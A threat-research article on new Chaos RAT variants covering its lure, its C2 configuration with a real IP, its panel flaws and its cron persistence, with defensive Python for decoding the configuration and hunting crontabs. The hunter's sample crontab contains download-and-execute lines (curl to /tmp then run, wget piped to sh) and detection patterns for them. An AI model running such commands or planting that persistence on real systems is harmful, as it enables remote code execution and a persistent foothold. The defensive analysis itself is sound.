New Chaos RAT Targets Linux and Windows Users to Steal Sensitive Data

A new wave of cyber threats has emerged with the discovery of updated variants of Chaos RAT, a notorious open-source remote administration tool (RAT) first identified in 2022.

According to a 2025 analysis by Acronis Threat Research Unit (TRU) researchers, the malware continues to evolve, targeting both Linux and Windows environments with capabilities built for espionage and data exfiltration.

Cross-Platform Malware on the Rise

Written in Go, Chaos RAT compiles to native binaries for several operating systems from a single code base, which lets attackers deploy payloads across diverse systems with relative ease.

[Figure: Chaos RAT attack chain]

The latest iterations, seen in real-world attacks, are disguised as legitimate network troubleshooting utilities aimed at Linux users. One recently analyzed sample, a “NetworkAnalyzer.tar.gz” archive submitted to VirusTotal from India, uses exactly this lure to get victims to download and run the payload.

Chaos RAT’s architecture is a flexible and dangerous toolset. Its web-based administrative panel, served by default at http://localhost:8080 with the default credentials admin:admin, gives the operator a dashboard to build 64-bit payloads, manage compromised clients, and execute commands; any panel left on those defaults and reachable over the network is open to whoever finds it.

[Figure: Chaos RAT admin panel]

The RAT supports a wide array of functions, including system information gathering (via the “getos” command), screenshot capture using the kbinani/screenshot library, and file manipulation through upload, download, and delete operations.

The client’s configuration, including the command-and-control (C2) address and port and a JSON Web Token (JWT) used to authenticate the client to the C2 server, is embedded as a Base64-encoded string. Base64 is encoding, not encryption, so these values are recoverable from any sample; recent samples embed IP addresses such as 176.65.141.63 and ports such as 5223.
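As an added example (not code from the Acronis report or the Chaos RAT project), the following Python shows how an analyst recovers C2 coordinates from such an embedded configuration. The JSON key names (server_address, server_port, token), the JWT claims and the signing key are assumptions used to construct the sample blob; only the host and port are taken from the indicators quoted above.

```python
"""Recover C2 coordinates from a Base64-wrapped client configuration.

Added example; not code from the Acronis report or the Chaos RAT project.
Assumed for illustration: the client embeds a JSON object with the keys
server_address, server_port and token, and the token is an HS256 JWT.
The sample blob below is constructed here; only the host and port are
taken from the IOCs in the text.
"""
import base64
import hashlib
import hmac
import json
from urllib.parse import urlparse


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are unpadded; restore the padding before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def make_hs256_jwt(claims: dict, key: bytes) -> str:
    """Mint an HS256 JWT. Used only to build the constructed sample."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


# Constructed sample (assumed key names and claims; host/port from the IOCs).
SAMPLE_KEY = b"panel-signing-key-for-illustration"
SAMPLE_TOKEN = make_hs256_jwt({"sub": "client", "exp": 1767225600}, SAMPLE_KEY)
SAMPLE_BLOB = base64.b64encode(json.dumps({
    "server_address": "http://176.65.141.63",
    "server_port": "5223",
    "token": SAMPLE_TOKEN,
}).encode()).decode()


def decode_config(blob: str) -> dict:
    """Undo the Base64 wrapping and extract the C2 host, port and JWT claims.

    Base64 is encoding, not encryption: anyone holding the binary recovers
    the server address and bearer token exactly as the client does. The JWT
    is parsed, not verified; for triage we want the claims, not trust in them.
    """
    cfg = json.loads(base64.b64decode(blob))
    url = urlparse(cfg["server_address"])
    header, payload, _sig = cfg["token"].split(".")
    return {
        "scheme": url.scheme,
        "host": url.hostname,
        "port": int(cfg["server_port"]),
        "jwt_header": json.loads(_b64url_decode(header)),
        "jwt_claims": json.loads(_b64url_decode(payload)),
    }


def verify_hs256(token: str, key: bytes) -> bool:
    """Check the signature once a key is in hand (e.g. from a seized panel).

    Constant-time comparison so the check itself does not leak timing.
    """
    header, payload, sig = token.split(".")
    expected = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))


if __name__ == "__main__":
    info = decode_config(SAMPLE_BLOB)
    print(f"C2 endpoint: {info['scheme']}://{info['host']}:{info['port']}")
    print("JWT header:", info["jwt_header"])
    print("JWT claims:", info["jwt_claims"])
    print("Signature valid with sample key:", verify_hs256(SAMPLE_TOKEN, SAMPLE_KEY))
```

In practice the blob is pulled from the binary with strings or a Go symbol dump rather than constructed; decode_config then gives you the C2 host and port to block and the JWT claims (subject, expiry) to pivot on, with no key required.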

Exploiting Vulnerabilities

Chaos RAT’s web panel also carries a critical vulnerability (CVE-2024-30850) that allows remote code execution on the C2 server itself; security researcher Chebuya demonstrated the flaw to humorous effect by making the panel play Rick Astley’s “Never Gonna Give You Up.”

This vulnerability, together with a cross-site scripting (XSS) issue (CVE-2024-31839), underscores the double-edged nature of Chaos RAT: it is both a tool for attackers and a potential target for counter-exploitation.

Its open-source availability on GitHub, last updated in October 2024, further amplifies the risk: threat actors can customize it to evade detection and blend into commodity cybercrime noise, which complicates attribution. APT groups such as APT41 and APT10 have used similar open-source RATs for the same reason.

Its persistence mechanisms, such as adding an entry to /etc/crontab on Linux to re-fetch the payload on a schedule, and its ability to run hidden on Windows, make it a practical tool for establishing footholds in ransomware campaigns.
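As an added example (not code from the Acronis report or the Chaos RAT project), the following Python parses system-crontab lines and flags entries that download and execute something on a tight schedule, the pattern described above. The crontab content is constructed here, and 192.0.2.10 is an RFC 5737 documentation address, not an indicator from the report.

```python
"""Hunt for download-and-execute persistence in /etc/crontab.

Added example; not code from the Acronis report or the Chaos RAT project.
System crontab lines carry a user field between the schedule and the
command (unlike per-user crontabs), and this parser expects that layout.
The sample crontab is constructed; 192.0.2.10 is an RFC 5737 documentation
address, not an indicator from the report.
"""
import re
from pathlib import Path

# Constructed /etc/crontab: two stock Debian-style entries, two suspicious ones.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root curl -fsSL http://192.0.2.10:5223/update -o /tmp/.nwa && chmod +x /tmp/.nwa && /tmp/.nwa
@reboot root /bin/sh -c "wget -qO- http://192.0.2.10/i.sh | sh"
"""

# Each signal alone is weak (ops teams do use curl in cron); combined they are not.
DOWNLOADER = re.compile(r"\b(?:curl|wget|fetch)\b")
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")
SCRATCH_DIR = re.compile(r"/(?:tmp|var/tmp|dev/shm)/")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da)?sh\b")
HIGH_FREQUENCY = re.compile(r"^(?:\*(?:\s+\*){4}|@reboot|@hourly)$")
ASSIGNMENT = re.compile(r"^[A-Za-z_]\w*=")


def parse_system_crontab(text: str) -> list[dict]:
    """Split crontab text into {line, schedule, user, command} records.

    Blank lines, comments and VAR=value assignments are skipped. Lines with
    too few fields are skipped rather than raising, so a partially written
    or deliberately odd file does not abort the hunt.
    """
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or ASSIGNMENT.match(s):
            continue
        if s.startswith("@"):                 # @reboot/@hourly style schedule
            parts = s.split(None, 2)
            if len(parts) < 3:
                continue
            schedule, user, command = parts
        else:                                 # five-field schedule
            parts = s.split(None, 6)
            if len(parts) < 7:
                continue
            schedule, user, command = " ".join(parts[:5]), parts[5], parts[6]
        entries.append({"line": lineno, "schedule": schedule, "user": user, "command": command})
    return entries


def score_entry(entry: dict) -> list[str]:
    """Return the reasons an entry looks like scheduled download-and-run persistence."""
    cmd, schedule = entry["command"], entry["schedule"]
    reasons = []
    if DOWNLOADER.search(cmd):
        reasons.append("downloader")
    if RAW_IP_URL.search(cmd):
        reasons.append("raw-ip-url")
    if SCRATCH_DIR.search(cmd):
        reasons.append("scratch-dir")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("pipe-to-shell")
    if HIGH_FREQUENCY.match(schedule):
        reasons.append("high-frequency")
    # Require two independent signals to keep a lone curl health check out of the queue.
    return reasons if len(reasons) >= 2 else []


def hunt(text: str) -> list[dict]:
    """Return every entry with at least two suspicious signals, reasons attached."""
    return [{**e, "reasons": score_entry(e)} for e in parse_system_crontab(text) if score_entry(e)]


if __name__ == "__main__":
    path = Path("/etc/crontab")
    text = path.read_text() if path.exists() else SAMPLE_CRONTAB
    for f in hunt(text):
        print(f"line {f['line']} user={f['user']} [{', '.join(f['reasons'])}] {f['command']}")
```

The same parser works on files under /etc/cron.d, which share the system-crontab layout; per-user crontabs (crontab -l) lack the user field and need the five-field branch without the user column. The two-signal threshold is the knob to tune: drop it to one in a locked-down fleet where cron should never fetch anything, raise it where operations legitimately run curl on a schedule.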

Acronis Cyber Protect Cloud detects these variants as “Trojan.Linux.ChaosRAT.A,” and the Acronis EDR now supports Linux environments such as Ubuntu 22.04, mapping detections to MITRE ATT&CK techniques to guide remediation.

As Chaos RAT continues to target sensitive data across platforms, defenders should load the indicators of compromise (IOCs) and YARA rules published by Acronis into their detection tooling and hunt for the persistence and C2 patterns described above.

Indicators of Compromise (IOCs)

Type        Value
SHA256      1e074d9dca6ef0edd24afb2d13ca4429def5fc5486cd4170c989ef60efd0bbb0
SHA256      a51416ea472658b5530a92163e64cfa51f983dfabe3da38e0646e92fb14de191
YARA rule   ELF_Chaos_RAT (detects Linux ELF binaries under 10 MB containing CHAOS-RAT indicators)
